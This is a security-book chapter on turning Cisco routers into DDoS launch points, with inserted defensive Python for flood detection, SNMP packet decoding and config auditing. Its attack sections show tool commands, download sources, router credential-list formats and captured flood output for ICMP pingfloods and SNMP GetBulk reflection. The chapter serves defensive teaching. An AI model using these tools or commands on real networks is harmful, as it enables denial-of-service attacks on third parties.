ABUSING CISCO APPLIANCES FOR NASTY DDOS DEEDS

While we briefly discussed this in Chapter 10, we needed to expand on it without extending that chapter, which was already overstretched and loaded with relevant data. This seems to be a rather appropriate spot. While using hacked routers and switches to mass ping remote targets is not exactly the most sophisticated and intelligent DDoS attack in the universe, this threat exists and should be dealt with. At the end of the chapter we review one rather original reflective SNMP-based DDoS attack that requires only the knowledge of an RO community. So stay tuned.

Mass Cisco Pinging, the SNMP Way

Attack
    Popularity:   4
    Simplicity:   4
    Impact:       9
    Risk Rating:  6

Taking into account the large number of SNMP-enabled routers and switches on the Internet, you might find Cisco-ping.sh very useful. It makes a router reachable over SNMP pingflood the target. If the abused appliance has a fat pipe, it becomes a very effective launch point for an attack that consumes the target's network bandwidth. Cisco-ping.sh is currently written for the Solaris platform but can be easily modified for Linux or BSD-based operating systems. You'll have to edit the script to change the locations of your SNMP tools and the routers/switches with the SNMP service enabled. With a bit of code hacking, it is easy to add automated functionality that takes a list of available Cisco SNMP-enabled devices and uses them together to launch a more effective attack.

SNMP Countermeasures

Countermeasure

It is highly advisable that you provide difficult-to-guess community names for your SNMP services. The best solution is to use SNMPv3, as it provides better authentication methods and encryption of the SNMP queries and replies. Also, unless SNMP is required for day-to-day network management and monitoring, it is advisable to disable the service altogether.

Mass Cisco Pinging, the Telnet Way MK I

Attack
    Popularity:   6
    Simplicity:   6
    Impact:       9
    Risk Rating:  7

Rampage.c is the tool considered to be heaven for every script kiddie on the planet who gets hold of a large number of Cisco routers with enable passwords. It allows attackers to use a great number of routers to generate pingflood traffic and direct it at the targeted machine by spoofing the originating IP address. Download it from the PacketStorm security web site, compile it, and run it in a manner similar to this:

    $ gcc -o rampage rampage.c
    $ ./rampage
    argc is 1
    rampage.c by slinkai and cpio
    usage: ./rampage-64 <ip> <router-list> <routers to use> <packets-to-use< (<size>)

The first argument is the target IP address; <router-list> is obviously the file with a list of routers; <routers to use> is the amount of routers to use from the list; <packets-to-use> is the number of packets to send for each router; and <size> is the size of packets to send from each device.

The output from the tool in action looks similar to this:

    arhontus dos $ ./rampage 192.168.66.100 /tmp/cisco-list 5 10 100
    argc is 6
    statistics display
    hitting 192.168.66.100 with 100 byte packets
    hitting 192.168.66.100 5 many times.
    status: connecting 1 to 192.168.66.202
    success: socket 1
    status: connecting 2 to 192.168.66.202
    success: socket 2
    status: connecting 3 to 192.168.66.202
    success: socket 3
    status: connecting 4 to 192.168.66.202
    success: socket 4
    status: connecting 5 to 192.168.66.202
    success: socket 5
    entering infitinte loop mode, ctrl-c to cancel

The traffic output looks like this:

    arhontus1 root # tcpdump -i eth0 -n host 192.168.66.202
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 68 bytes
    19:50:11.588589 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 1564
    19:50:11.588968 arp who-has 192.168.66.202 tell 192.168.66.100
    19:50:11.593515 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 9572
    19:50:11.597936 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 3410
    19:50:11.600327 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 1564
    19:50:11.601971 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 9572
    19:50:11.603661 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 3410
    <lines were omitted to save page count>

A simpler (and slower) mass pinger than Rampage, which likewise works through compromised IOS routers, is Ciscobomb. It is written in Perl, and you can download it from http://www.blacksheepnetworks.com/security/hack/hack2/www.getrewted.com.ar/ . There's no easier way of mass pingflooding than this:

    arhontus # perl ciscobomb.pl -t 192.168.66.102 -p 100
    >> CISCOBOMB 0.7 / ca0s / getREWTED labs <<
    [Target: 192.168.66.102] >> Attack is started.
    Just go to see TV and wait ... :)

The list of hacked routers has to be stored in a routers.db file, one device per line, in the format router_IP:login_password:enable_password.

Telnet MK I Countermeasure

Countermeasure

If you are a network administrator and see a large amount of ICMP traffic originating from your routers, don't ignore it. Most likely, you are being used as an attacking node by a program similar to Rampage or one of the other tools described later in the chapter. The way to deal with this is to reconsider the authentication methods used on your network devices. Limit all administrative services to the IPs and VLANs of the legitimate users and systems administrators who actually require these services.

Mass Cisco Pinging, the Telnet Way MK II

Attack
    Popularity:   7
    Simplicity:   6
    Impact:       9
    Risk Rating:  7

dCisco-DoS.c is a next-generation, improved rampage.c that can be used to pingflood the target from a list of known Cisco routers. Along with using it to DDoS your IRC mates, dCisco-DoS.c can be used to test the network's resilience to DDoS attacks after installing the new and expensive anti-DDoS boxes that your boss always wanted. Download it from http://www.packetstormsecurity.org/ by searching for dcisco. Compile it and run it in the following way:

    $ gcc -o dcisco dcisco.c
    $ ./dcisco
    Usage: ./dcisco <Target> <List> <Repeat Count> <Datagram size> <Password>
    $ ./dcisco-noenable 192.168.66.100 /tmp/cisco-list 10 100 123456
    Target:192.168.66.100
    File:/tmp/cisco-list
    Password:123456
    Packet Size:100
    Repeat Count:10
    Routers:5
    Router 1:192.168.66.202  success:1
    .
    .

Launching tcpdump on the target will show the success of the attack:

    # tcpdump -i eth0 -n
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 68 bytes
    .
    .
    17:25:08.062826 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 4419
    17:25:08.062991 IP 192.168.66.100 > 192.168.66.202: icmp 80: echo reply seq 4419
    17:25:08.065926 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 4419
    17:25:08.066054 IP 192.168.66.100 > 192.168.66.202: icmp 80: echo reply seq 4419
    17:25:08.068204 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 4419
    .
    .
    20 packets captured
    20 packets received by filter
    0 packets dropped by kernel

Along with this tool, you'll need a lot of Cisco devices with known user/enable passwords; the more devices you have, the better your chances of taking down the target, cutting its network connectivity, and overloading its CPU.

Telnet MK II Countermeasures

Countermeasure

The general solution here is to use strong authentication methods on your Cisco devices and to allow user/enable access to the appliance only from legitimate IPs, networks, and VLANs.
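Both Telnet-way countermeasures come down to the same observable: ICMP echo requests streaming out of your own routers, as in the Rampage and dCisco captures above. The following is an added example, not code from the book or from either tool. It parses tcpdump lines of the shape shown in those captures, counts echo requests per source address per one-second window, and additionally flags sources whose requests cycle through only a handful of sequence numbers, which both captures exhibit (Rampage repeats 1564/9572/3410, dCisco repeats 4419). The sample lines, the thresholds and the sequence-number heuristic are constructed assumptions, not figures from the book.

```python
import re
from collections import defaultdict

# tcpdump line shape used in the captures above, e.g.
#   17:25:08.062826 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 4419
ECHO_REQ_RE = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2}\.\d+) IP (\S+) > (\S+): icmp \d+: echo request seq (\d+)$"
)


def constructed_capture():
    """Constructed sample (not the book's capture): a router-sourced burst of
    30 echo requests within 0.1 s that recycles a single sequence number,
    interleaved with replies, plus a host pinging once per second."""
    lines = []
    for i in range(30):
        ts = 8.062826 + i * 0.003
        lines.append(f"17:25:{ts:09.6f} IP 192.168.66.202 > 192.168.66.100: "
                     f"icmp 80: echo request seq 4419")
        lines.append(f"17:25:{ts + 0.0002:09.6f} IP 192.168.66.100 > 192.168.66.202: "
                     f"icmp 80: echo reply seq 4419")
    for i in range(3):
        lines.append(f"17:25:{10 + i:02d}.100000 IP 192.168.66.50 > 192.168.66.100: "
                     f"icmp 64: echo request seq {i + 1}")
    return lines


def detect_echo_floods(lines, window_s=1.0, rate_threshold=20, max_distinct_seqs=8):
    """Return {source_ip: [reasons]} for sources that look like scripted
    pingflood nodes. Two heuristics (thresholds are assumptions):
      - more than rate_threshold echo requests from one source in one window
      - at least rate_threshold requests in total that reuse very few seq values
    Echo replies and non-ICMP lines are ignored by the regex."""
    per_src_window = defaultdict(int)
    per_src_seqs = defaultdict(set)
    per_src_total = defaultdict(int)
    for line in lines:
        m = ECHO_REQ_RE.match(line.strip())
        if not m:
            continue
        hh, mm, ss, src, _dst, seq = m.groups()
        t = int(hh) * 3600 + int(mm) * 60 + float(ss)
        bucket = int(t // window_s)
        per_src_window[(src, bucket)] += 1
        per_src_seqs[src].add(int(seq))
        per_src_total[src] += 1

    alerts = {}
    for (src, bucket), n in sorted(per_src_window.items()):
        if n >= rate_threshold:
            alerts.setdefault(src, []).append(
                f"{n} echo requests in one {window_s:g}s window (bucket {bucket})")
    for src, seqs in per_src_seqs.items():
        if per_src_total[src] >= rate_threshold and len(seqs) <= max_distinct_seqs:
            alerts.setdefault(src, []).append(
                f"{per_src_total[src]} requests cycling over only {len(seqs)} seq value(s)")
    return alerts


if __name__ == "__main__":
    for src, reasons in detect_echo_floods(constructed_capture()).items():
        print(src)
        for r in reasons:
            print("   ", r)
```

Feed it `tcpdump -n -l` output from a span port or from the router's upstream link; a router address that trips either heuristic is the node to pull administrative access from first. Both heuristics are deliberately coarse; a monitoring host that pings many targets will trip the rate check, so whitelist known pollers.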

Mass Cisco Flood, the SNMP Way

Attack
    Popularity:   9
    Simplicity:   8
    Impact:       10
    Risk Rating:  9

The second generation of SNMP network flooding and D/DoS tools is a smart and effective way of spoofing network management protocol queries to consume the network bandwidth of the targeted host/network. It works by faking an SNMP BulkGet request for .1.3.6.1 (the equivalent of the snmpbulkget -v2c <device> public internet-address command) so that it appears to originate from the targeted machine. BulkGet returns as many variable bindings as the agent allows in a single response, rather than one Management Information Base (MIB) object per request. The attacker therefore sends very little spoofed traffic, while the SNMP agents answer with a large volume of responses addressed to the target. The tool can be downloaded from http://www.packetstormsecurity.org by searching for snmpdos.

    arhontus dos # ./snmpdos
    SNMP DoS v1.0
    Usage: snmpdos [-t target ip_addr] [-f host file] [-l loop count]

The use of this tool is self-evident:

    arhontus dos # ./snmpdos -t 192.168.66.100 -f /tmp/cisco-list -l 10
    80 packets sent
    tcpdump -i eth0 -n host 192.168.66.202
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 68 bytes
    .
    .
    18:41:41.908997 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]
    18:41:41.910144 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]
    18:41:41.911298 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]
    18:41:41.912447 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]
    18:41:41.913598 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]
    80 packets captured
    80 packets received by filter
    0 packets dropped by kernel

Looking at the command and the generated output, you might ask: how did we get 80 packets when we specified a loop count of only 10? The answer lies in the number of routers listed in the <host file>: the tool applies the counter to each of the routers, switches, or other SNMP-enabled appliances listed in the file, so the total is the loop count multiplied by the number of listed devices.

Let's take a closer look at the traffic generated by this tool. As the following output shows, the spoofed request that appears to come from the targeted host is small (a 66-byte packet carrying a 23-byte GetBulk PDU), while the response the router's SNMP service sends back to the target is far larger (a 1353-byte GetResponse PDU):

    #---attacker traffic start---#
    arhontus root # tcpdump -i eth0 -n host 192.168.66.202 -x -s 65535
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
    19:04:32.102836 IP 192.168.66.100.161 > 192.168.66.202.161:  GetBulk(23)  N=0 M=100 .1.3.6.1
        0x0000:  4500 0042 0417 0000 f511 bb14 c0a8 4264  E..B..........Bd
        0x0010:  c0a8 42ca 00a1 00a1 002e 50e7 3024 0201  ..B.......P.0$..
        0x0020:  0104 0670 7562 6c69 63a5 1702 047b 73cc  ...public....{s.
        0x0030:  1302 0100 0201 6430 0930 0706 032b 0601  ......d0.0...+..
        0x0040:  0500                                     ..
    #---attacker traffic end---#
    #---target traffic start---#
    arhontus1 root # tcpdump -i eth0 -n host 192.168.66.202 -X -s 65535
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
    18:39:29.755592 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(1353)
        .1.3.6.1.2.1.1.1.0="Cisco Internetwork Operating System Software ^M^JIOS (tm)
        C2600 Software (C2600-IK9O3S3-M), Version 12.3(6), RELEASE SOFTWARE
        (fc3)^M^JCopyright (c) 1986-2004 by cisco Systems, Inc.^M^JCompiled Wed 11-Feb-04
        19:24 by kellythw" .1.3.6.1.2.1.1.2.0=.1.3.6.1.4.1.9.1.186
        .1.3.6.1.2.1.1.3.0=292780808 .1.3.6.1.2.1.1.4.0=""
        .1.3.6.1.2.1.1.5.0="router.snmp.arhont.com" .1.3.6.1.2.1.1.6.0=""
        .1.3.6.1.2.1.1.7.0=78 .1.3.6.1.2.1.1.8.0=0 .1.3.6.1.2.1.2.1.0=9
        .1.3.6.1.2.1.2.2.1.1.1=1 .1.3.6.1.2.1.2.2.1.1.2=2 .1.3.6.1.2.1.2.2.1.1.3=3
        .1.3.6.1.2.1.2.2.1.1.4=4 .1.3.6.1.2.1.2.2.1.1.5=5 .1.3.6.1.2.1.2.2.1.1.6=6
        .1.3.6.1.2.1.2.2.1.1.8=8 .1.3.6.1.2.1.2.2.1.1.9=9 .1.3.6.1.2.1.2.2.1.1.10=10
        .1.3.6.1.2.1.2.2.1.2.1="Ethernet0/0" .1.3.6.1.2.1.2.2.1.2.2="Serial0/0"
        .1.3.6.1.2.1.2.2.1.2.3="Ethernet0/1" .1.3.6.1.2.1.2.2.1.2.4="Serial0/1"
        .1.3.6.1.2.1.2.2.1.2.5="Null0" .1.3.6.1.2.1.2.2.1.2.6="Loopback0"
        .1.3.6.1.2.1.2.2.1.2.8="Virtual-Template1" .1.3.6.1.2.1.2.2.1.2.9="Virtual-Access1"
        .1.3.6.1.2.1.2.2.1.2.10="Virtual-Access2"
        .1.3.6.1.2.1.2.2.1.3.1=6 .1.3.6.1.2.1.2.2.1.3.2=23 .1.3.6.1.2.1.2.2.1.3.3=6
        .1.3.6.1.2.1.2.2.1.3.4=22 .1.3.6.1.2.1.2.2.1.3.5=1 .1.3.6.1.2.1.2.2.1.3.6=24
        .1.3.6.1.2.1.2.2.1.3.8=23 .1.3.6.1.2.1.2.2.1.3.9=23 .1.3.6.1.2.1.2.2.1.3.10=23
        .1.3.6.1.2.1.2.2.1.4.1=1500 .1.3.6.1.2.1.2.2.1.4.2=1500
        .1.3.6.1.2.1.2.2.1.4.3=1500 .1.3.6.1.2.1.2.2.1.4.4=1500
        .1.3.6.1.2.1.2.2.1.4.5=1500 .1.3.6.1.2.1.2.2.1.4.6=1514
        .1.3.6.1.2.1.2.2.1.4.8=1500 .1.3.6.1.2.1.2.2.1.4.9=1500
        .1.3.6.1.2.1.2.2.1.4.10=1500 .1.3.6.1.2.1.2.2.1.5.1=10000000
        .1.3.6.1.2.1.2.2.1.5.2=1544000 .1.3.6.1.2.1.2.2.1.5.3=10000000
        .1.3.6.1.2.1.2.2.1.5.4=1544000 .1.3.6.1.2.1.2.2.1.5.5=4294967295
        .1.3.6.1.2.1.2.2.1.5.6=4294967295 .1.3.6.1.2.1.2.2.1.5.8=100000000
        .1.3.6.1.2.1.2.2.1.5.9=100000000 .1.3.6.1.2.1.2.2.1.5.10=100000000
        .1.3.6.1.2.1.2.2.1.6.1=00_02_16_9c_0a_80 .1.3.6.1.2.1.2.2.1.6.2=""
        .1.3.6.1.2.1.2.2.1.6.3=00_02_16_9c_0a_81
        .
        <output lines were omitted to save space>
    #---target traffic end---#
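To see exactly what makes the request so cheap for the attacker and so expensive for the agent, the following added example (not the book's code, and not snmpdos) decodes the 66-byte GetBulk request byte for byte as tcpdump printed it in the attacker-side capture above. A minimal BER reader pulls out the version, community, PDU type, request-id, non-repeaters, max-repetitions and the requested OID from the IP/UDP payload, and a second function lists the traits a network defender can alert on in such a request. The threshold value and the indicator heuristics are assumptions.

```python
# Hex dump of the spoofed GetBulk request as tcpdump printed it in the capture
# above: IPv4 header, UDP header and a 38-byte SNMPv2c message (66 bytes total).
GETBULK_HEX = (
    "4500 0042 0417 0000 f511 bb14 c0a8 4264"
    "c0a8 42ca 00a1 00a1 002e 50e7 3024 0201"
    "0104 0670 7562 6c69 63a5 1702 047b 73cc"
    "1302 0100 0201 6430 0930 0706 032b 0601"
    "0500"
)
PACKET = bytes.fromhex(GETBULK_HEX.replace(" ", ""))

PDU_TYPES = {0xa0: "GetRequest", 0xa1: "GetNextRequest", 0xa2: "GetResponse",
             0xa3: "SetRequest", 0xa5: "GetBulkRequest"}
VERSIONS = {0: "v1", 1: "v2c", 3: "v3"}


def read_tlv(buf, pos):
    """Read one BER tag/length/value at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                 # long-form length: low 7 bits = octet count
        n = length & 0x7f
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def ber_int(value):
    return int.from_bytes(value, "big", signed=True)


def ber_oid(value):
    """Decode a BER OBJECT IDENTIFIER: first octet packs two arcs, rest is base-128."""
    arcs = [value[0] // 40, value[0] % 40]
    acc = 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7f)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_snmp_request(packet):
    """Parse IPv4 + UDP headers and an SNMP v1/v2c message; return the fields a
    detector keys on. In a GetBulk PDU the two integers after request-id are
    non-repeaters and max-repetitions (error-status/error-index in other PDUs)."""
    ihl = (packet[0] & 0x0f) * 4
    src = ".".join(map(str, packet[12:16]))
    dst = ".".join(map(str, packet[16:20]))
    udp = packet[ihl:]
    sport = int.from_bytes(udp[0:2], "big")
    dport = int.from_bytes(udp[2:4], "big")
    _, msg, _ = read_tlv(udp[8:], 0)          # outer SEQUENCE { version, community, PDU }
    _, ver, p = read_tlv(msg, 0)
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    _, req_id, q = read_tlv(pdu, 0)
    _, field1, q = read_tlv(pdu, q)
    _, field2, q = read_tlv(pdu, q)
    _, varbinds, _ = read_tlv(pdu, q)
    oids, vpos = [], 0
    while vpos < len(varbinds):
        _, vb, vpos = read_tlv(varbinds, vpos)  # VarBind ::= SEQUENCE { OID, value }
        _, oid, _ = read_tlv(vb, 0)
        oids.append(ber_oid(oid))
    is_bulk = pdu_tag == 0xa5
    return {
        "src": src, "dst": dst, "sport": sport, "dport": dport,
        "version": VERSIONS.get(ber_int(ver), "unknown"),
        "community": community.decode("ascii", "replace"),
        "pdu": PDU_TYPES.get(pdu_tag, hex(pdu_tag)),
        "request_id": ber_int(req_id),
        "non_repeaters": ber_int(field1) if is_bulk else None,
        "max_repetitions": ber_int(field2) if is_bulk else None,
        "oids": oids,
    }


def reflection_indicators(parsed, max_rep_threshold=20):
    """Heuristic reasons (assumed thresholds) a request looks like reflection
    bait rather than a manager poll; an empty list means nothing stood out."""
    reasons = []
    if parsed["pdu"] == "GetBulkRequest" and parsed["max_repetitions"] >= max_rep_threshold:
        reasons.append(f"GetBulk with max-repetitions={parsed['max_repetitions']}")
    if any(o in ("1.3.6.1", "1.3", "1") for o in parsed["oids"]):
        reasons.append("walk starts at the top of the internet subtree, so the reply is as big as the agent allows")
    if parsed["sport"] == 161:
        reasons.append("source port 161: a manager uses an ephemeral port; this aims the reply at the spoofed host's agent port")
    return reasons


if __name__ == "__main__":
    fields = parse_snmp_request(PACKET)
    for k, v in fields.items():
        print(f"{k:16} {v}")
    for reason in reflection_indicators(fields):
        print("indicator:", reason)
```

Running it on the capture above yields version v2c, community public, a GetBulkRequest with non-repeaters 0 and max-repetitions 100 for OID 1.3.6.1, sent from 192.168.66.100 port 161, which matches tcpdump's summary line (GetBulk(23) N=0 M=100 .1.3.6.1). All three indicators fire. On an agent-side capture the same parser can be pointed at inbound UDP/161 payloads to flag GetBulk requests with large max-repetitions arriving from addresses that are not your management stations.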

SNMP Countermeasures

Countermeasure

It is highly advisable that you implement difficult-to-guess community names for your SNMP services. The best solution is to use SNMPv3, which provides better authentication methods and encryption of the SNMP queries and replies. Also, unless SNMP is required for day-to-day network management and monitoring, it is advisable to disable the service altogether.
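The same countermeasure is given for both SNMP attacks in this chapter, and it is easy to check mechanically. As an added example (not from the book or from Cisco), here is a small audit script that reads an IOS-style running-config text and reports the settings the countermeasure warns about: default or short community names, read-write communities (write access is what the SNMP-driven mass pinger relies on), communities without an access-list restricting who may query, and v1/v2c communities in use with no SNMPv3 group at the priv level. The two config excerpts are constructed for the example, and the eight-character minimum and the list of default names are assumptions.

```python
import re

# Constructed IOS-style excerpts (not from the book): a weak setup and a
# hardened one, so the audit has something to flag and something to pass.
WEAK_CONFIG = """\
hostname router1
snmp-server community public RO
snmp-server community private RW
"""

HARDENED_CONFIG = """\
hostname router1
access-list 10 permit 192.0.2.10
access-list 10 deny any
snmp-server group NMSGROUP v3 priv
snmp-server user nmsuser NMSGROUP v3 auth sha <auth-pass-placeholder> priv aes 128 <priv-pass-placeholder>
snmp-server community J7q!x2Lp RO 10
"""

# Names an attacker tries first; assumed list, extend for your environment.
DEFAULT_COMMUNITIES = {"public", "private", "cisco", "admin", "secret"}
MIN_COMMUNITY_LEN = 8

# snmp-server community STRING [view VIEW] [RO|RW] [ACL]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?:\s+view\s+\S+)?(?:\s+(RO|RW))?(?:\s+(\S+))?$",
    re.IGNORECASE)
# snmp-server group NAME v3 {noauth|auth|priv} ...
GROUP_RE = re.compile(r"^snmp-server group \S+ v3 (noauth|auth|priv)\b", re.IGNORECASE)


def audit_snmp_config(config_text):
    """Return a list of (severity, message) findings for the SNMP lines of an
    IOS-style config. Checks: default/short community names, RW communities,
    communities with no ACL, and v1/v2c present without an SNMPv3 priv group."""
    findings = []
    has_v3_priv = False
    community_count = 0
    for raw in config_text.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            community_count += 1
            name = m.group(1)
            mode = (m.group(2) or "RO").upper()   # IOS defaults to read-only
            acl = m.group(3)
            if name.lower() in DEFAULT_COMMUNITIES:
                findings.append(("HIGH", f"default community name '{name}'"))
            elif len(name) < MIN_COMMUNITY_LEN:
                findings.append(("MEDIUM", f"short community name '{name}'"))
            if mode == "RW":
                findings.append(("HIGH", f"read-write community '{name}'"))
            if acl is None:
                findings.append(("MEDIUM", f"community '{name}' has no access-list"))
            continue
        g = GROUP_RE.match(line)
        if g and g.group(1).lower() == "priv":
            has_v3_priv = True
    if community_count and not has_v3_priv:
        findings.append(("MEDIUM", "v1/v2c communities configured and no SNMPv3 'priv' group"))
    return findings


def highest_severity(findings):
    order = {"HIGH": 2, "MEDIUM": 1}
    return max((order[s] for s, _ in findings), default=0)


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label} ==")
        for sev, msg in audit_snmp_config(cfg) or [("OK", "no findings")]:
            print(f"  [{sev}] {msg}")
```

Pipe `show running-config` output into it (or run it over a directory of config backups) to find the devices still carrying community strings that make them usable as mass-ping or reflection nodes; a device with no snmp-server lines at all produces no findings, which is the "disable it if you don't need it" case.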



Source: Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions (ISBN 0072259175, 2005)
